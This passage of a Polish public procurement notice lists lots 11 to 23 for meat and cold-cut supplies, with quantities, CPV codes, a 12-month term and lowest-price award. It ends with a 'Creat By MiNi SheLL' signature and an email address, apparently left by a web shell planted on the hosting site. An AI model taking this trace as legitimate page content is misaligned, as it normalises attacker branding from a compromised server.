Jedn.
miary
Ilość
1
Salami
151 312 30-6
salami
kg
200
2


Wędliny
151 311 30-5
Wędlina średnio rozdrobniona
kg
250


Wędlina grubo rozdrobniona
kg
300


Wędlina drobno rozdrobniona
kg
300


Wędlina średnio rozdrobniona
kg
250


Wędlina wieprzowa
kg
300


wędlina
kg
600


Wędlina wieprzowa
kg
300


Wędlina grubo rozdrobniona
kg
350


wędlina
kg
250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pasztety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XI: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Pasztety
151 313 10-1
pasztetowa
kg
200


Pasztet 
kg
25


Pasztet 
kg
25


Pasztet firmowy
kg
150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Wołowina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
wołowina
151 111 00-0
wołowna
kg
400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Wieprzowina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XIII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wieprzowina
151 130 00-3
Boczek świeży
kg
50


Nogi wieprzowe 
kg
50


golonka
kg
200


Karkówka b/k
kg
300


Karkówka z/k
kg
100


Łopatka b/k
kg
300


Łopatka z/k
kg
200


Mięso mielone
kg
300


Polędwiczki wieprzowe 
kg
100


Schab b/k
kg
300


Schab z/k
kg
200


słonina
kg
100


Szynka b/k
kg
300


Szynka z golonką
kg
100


Szynka z/k
kg
150


żeberka
kg
100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Mięso suszone, solone, wędzone lub marynowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XIV: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Mięso suszone, solone, wędzone lub marynowane
151 312 00-7
Boczek wędzony
kg
200


Polędwica wędzona
kg
100


baleron
kg
200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.12.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Podroby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XV: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


podroby
151 140 00-0
Flaki wołowe
kg
200


Ozory  wieprzowe 
kg
50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> szynka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XVI: 


Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


szynka
151 314 10-2
Szynka gotowana
kg
150


Szynka wędzona
kg
30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.14.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Wędliny drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XVII: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




Wędliny drobiowe
151 311 35-0
Beton drobiowy
kg
50


Mielonka drobiowa
kg
100


Polędwica drobiowa
kg
100


Pierś drobiowa
kg
50


Śniadaniowa drobiowa
kg
50


Szynka tostowa drobiowa
kg
30


Rolada drobiowa
kg
30


Szynka drobiowa
kg
50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Kaszanka i inne wędliny krwiste.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XVIII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Kaszanka  i inne  wędliny krwiste
151 314 10-2
Salceson czarny
kg
150


Salceson ozorkowy
kg
30


krupnioki
kg
50


kaszanka
kg
150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.14.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XIX: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Luncheon meat (lanszmit)
kg
100


metka
kg
100


mortadela
kg
150


Parówka cienka
kg
100


Parówka - serdelka
kg
100


Parówka hot-dog
kg
100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XX: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Kiełbasa śląska
kg
100


Kiełbasa zwyczajna
kg
400


Kiełbasa toruńska
kg
150


kabanosy
kg
50


Kiełbasa biała parzona
kg
300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Salami, wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XXI: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Salami
151 312 30-6
Salami
kg
50
2


Wędliny
151 311 30-5
Krakowska parzona
kg
150


ogonówka
kg
200


Szynka konserwowa prasowana
kg
100


szynkowa
kg
300


żywiecka
kg
150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.12.30-6, 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pasztety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XXII: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Pasztety
151 313 10-1
pasztetowa
kg
200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Wołowina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XXIII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
wołowina
151 111 00-0
wołowina
kg
250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com